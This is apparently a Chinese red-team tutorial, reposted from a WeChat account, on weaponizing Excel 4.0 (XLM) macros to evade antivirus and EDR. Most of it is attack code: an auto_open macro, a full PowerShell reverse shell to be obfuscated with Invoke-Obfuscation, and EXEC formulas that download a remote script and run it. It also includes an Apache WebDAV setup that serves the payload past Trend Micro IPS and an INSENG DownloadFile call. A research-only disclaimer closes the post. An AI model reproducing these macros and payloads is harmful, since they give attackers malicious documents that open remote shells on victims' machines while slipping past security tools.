From:https://0xsp.com/offensive/red-ops-techniques/bypass-endpoint-with-xlm-weaponization
XLM(macro 4.0)被认为是红队运作的绝佳技术,因为XLM难以分析并且很难被反病毒解决方案检测到,而大多数反病毒引擎却可以检测到VBA。
绕过基本的反病毒似乎很容易,但是要绕过具有(HIPS)技术的企业解决方案的检测也很难,并且一旦执行了恶意命令,立即会发出警报。
XLM的初始访问
右键单击所选工作表,然后单击“插入”对话框
选择excel 4.0宏
键入一些要执行的命令
=exec("calc.exe")将A1单元格名字重命名为auto_open,允许打开文件时执行命令
打开
XLM的武器化
我们的目的获得shell,不是执行calc,使用Invoke-Obfuscation混淆一个反弹shell的powershell脚本
https://github.com/danielbohannon/Invoke-Obfuscation/
Import-Module ./Invoke-Obfuscation.psd1Invoke-Obfuscation
$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
使用TOKENALL的混淆方式
可绕过windows defender
=EXEC("powershell-c IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps.txt')")=HALT()
但是会被趋势入侵防御系统拦截,这里使用webdav托管脚本来执行
sudo apt-get updatesudo apt-get install apache2sudo mkdir /var/www/webdavsudo chown -R www-data:www-data /var/www/
启用webdav模块
sudo a2enmod davsudo a2enmod dav_fs
修改virtual host部分
Alias /webdav /var/www/webdav<Directory /var/www/webdav>DAV On</Directory>
插入
=EXEC("cmd/k net use z: \YOURIPwebdav&powershell -exec bypass -f \YOURIPwebdavps.ps1")=HALT()
另附一个调用inseng.dll下载文件的命令FROM:@DissectMalware
=CALL("INSENG","DownloadFile","BCCJ","https://google.com","D:testgoogle.html",1)=HALT()
本文始发于微信公众号(关注安全技术):武器化XLM绕过EDR
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论